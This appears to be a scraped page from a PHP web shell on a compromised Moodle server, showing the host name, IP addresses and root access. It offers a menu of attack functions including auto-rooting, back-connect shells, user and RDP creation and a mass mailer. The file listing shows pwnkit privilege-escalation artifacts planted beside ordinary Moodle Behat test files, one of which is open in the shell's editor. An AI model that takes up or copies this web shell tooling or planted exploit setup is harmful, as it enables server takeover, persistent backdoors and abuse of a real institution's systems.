Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
blocks /
timeline /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
block_timeline_courses.feature
5.81
KB
-rwxrwxrwx
block_timeline_dates.feature
7.67
KB
-rwxrwxrwx
block_timeline_pagelimit_persi...
3.95
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : block_timeline_dates.feature
@block @block_timeline @javascript Feature: The timeline block allows users to see upcoming activities In order to enable the timeline block As a student I can add the timeline block to my dashboard Background: Given the following "users" exist: | username | firstname | lastname | email | idnumber | | student1 | Student | 1 | student1@example.com | S1 | | student2 | Student | 2 | student2@example.com | S2 | And the following "courses" exist: | fullname | shortname | category | startdate | enddate | | Course 1 | C1 | 0 | ##1 month ago## | ##15 days ago## | | Course 2 | C2 | 0 | ##yesterday## | ##tomorrow## | | Course 3 | C3 | 0 | ##first day of next month## | ##last day of next month## | And the following "activities" exist: | activity | course | idnumber | name | intro | timeopen | timeclose | | choice | C2 | choice1 | Test choice 1 | Test choice description | ##yesterday## | ##tomorrow## | | choice | C1 | choice2 | Test choice 2 | Test choice description | ##1 month ago## | ##15 days ago## | | choice | C3 | choice3 | Test choice 3 | Test choice description | ##first day of +5 months## | ##last day of +5 months## | | feedback | C2 | feedback1 | Test feedback 1 | Test feedback description | ##yesterday## | ##tomorrow## | | feedback | C1 | feedback2 | Test feedback 2 | Test feedback description | ##first day of +10 months## | ##last day of +10 months## | | feedback | C3 | feedback3 | Test feedback 3 | Test feedback description | ##first day of +5 months## | ##last day of +5 months## | And the following "activities" exist: | activity | course | idnumber | name | intro | timeopen | duedate | | assign | C1 | assign1 | Test assign 1 | Test assign description | ##1 month ago## | ##yesterday## | And the following "course enrolments" exist: | user | course | role | | student1 | C1 | student | | student1 | C2 | student | | student1 | C3 | student | Scenario: Next 7 days in date view Given I log in as "student1" And I click on "Filter timeline items" "button" in the "Timeline" "block" When I click on "Next 7 days" "link" in the "Timeline" "block" Then I should see "Test choice 1 closes" in the "Timeline" "block" And I should see "Test feedback 1 closes" in the "Timeline" "block" And I should not see "Test choice 2 closes" in the "Timeline" "block" And I should not see "Test choice 3 closes" in the "Timeline" "block" And I should not see "Test feedback 3 closes" in the "Timeline" "block" And I should not see "Test assign 1 is due" in the "Timeline" "block" Scenario: Overdue in date view Given I log in as "student1" And I click on "Filter timeline items" "button" in the "Timeline" "block" When I click on "Overdue" "link" in the "Timeline" "block" Then I should see "Test assign 1 is due" in the "Timeline" "block" And I should not see "Test choice 2 closes" in the "Timeline" "block" And I should not see "Test feedback 1 closes" in the "Timeline" "block" And I should not see "Test choice 1 closes" in the "Timeline" "block" And I should not see "Test choice 3 closes" in the "Timeline" "block" And I should not see "Test feedback 3 closes" in the "Timeline" "block" Scenario: All in date view Given I log in as "student1" And I click on "Filter timeline items" "button" in the "Timeline" "block" When I click on "All" "link" in the "Timeline" "block" Then I should see "Test assign 1 is due" in the "Timeline" "block" And I should see "Test feedback 1 closes" in the "Timeline" "block" And I should see "Test choice 1 closes" in the "Timeline" "block" And I should see "Test choice 3 closes" in the "Timeline" "block" And I should see "Test feedback 3 closes" in the "Timeline" "block" And I should not see "Test choice 2 closes" in the "Timeline" "block" And I should not see "Test feedback 2 closes" in the "Timeline" "block" And I click on "[data-region='paging-bar'] [data-control='next'] [data-region='page-link']" "css_element" in the "Timeline" "block" And I should see "Test feedback 2 closes" in the "Timeline" "block" And I should not see "Test assign 1 is due" in the "Timeline" "block" And I should not see "Test feedback 1 closes" in the "Timeline" "block" And I should not see "Test choice 1 closes" in the "Timeline" "block" And I should not see "Test choice 3 closes" in the "Timeline" "block" And I should not see "Test feedback 3 closes" in the "Timeline" "block" And I should not see "Test choice 2 closes" in the "Timeline" "block" Scenario: All in date view no next Given I log in as "student1" And I click on "Filter timeline items" "button" in the "Timeline" "block" And I click on "All" "link" in the "Timeline" "block" And I click on "5" "button" in the "Timeline" "block" When I click on "25" "link" in the "Timeline" "block" Then I should see "Test assign 1 is due" in the "Timeline" "block" And I should see "Test feedback 1 closes" in the "Timeline" "block" And I should see "Test choice 1 closes" in the "Timeline" "block" And I should see "Test choice 3 closes" in the "Timeline" "block" And I should see "Test feedback 3 closes" in the "Timeline" "block" And I should see "Test feedback 2 closes" in the "Timeline" "block" And I should not see "Test choice 2 closes" in the "Timeline" "block" Scenario: Persistent All in date view Given I log in as "student1" And I click on "Filter timeline items" "button" in the "Timeline" "block" When I click on "All" "link" in the "Timeline" "block" And I reload the page Then I should see "Test assign 1 is due" in the "Timeline" "block" And I should see "Test feedback 1 closes" in the "Timeline" "block" And I should see "Test choice 1 closes" in the "Timeline" "block" And I should see "Test choice 3 closes" in the "Timeline" "block" And I should see "Test feedback 3 closes" in the "Timeline" "block" And I should not see "Test choice 2 closes" in the "Timeline" "block" And I should not see "Test feedback 2 closes" in the "Timeline" "block" And I click on "[data-region='paging-bar'] [data-control='next']" "css_element" in the "Timeline" "block" And I should see "Test feedback 2 closes" in the "Timeline" "block" And I should not see "Test assign 1 is due" in the "Timeline" "block" And I should not see "Test feedback 1 closes" in the "Timeline" "block" And I should not see "Test choice 1 closes" in the "Timeline" "block" And I should not see "Test choice 3 closes" in the "Timeline" "block" And I should not see "Test feedback 3 closes" in the "Timeline" "block" And I should not see "Test choice 2 closes" in the "Timeline" "block" Scenario: Persistent Overdue in date view Given I log in as "student1" And I click on "Filter timeline items" "button" in the "Timeline" "block" When I click on "Overdue" "link" in the "Timeline" "block" And I reload the page Then I should see "Test assign 1 is due" in the "Timeline" "block" And I should not see "Test choice 2 closes" in the "Timeline" "block" And I should not see "Test feedback 1 closes" in the "Timeline" "block" And I should not see "Test choice 1 closes" in the "Timeline" "block" And I should not see "Test choice 3 closes" in the "Timeline" "block" And I should not see "Test feedback 3 closes" in the "Timeline" "block"
Close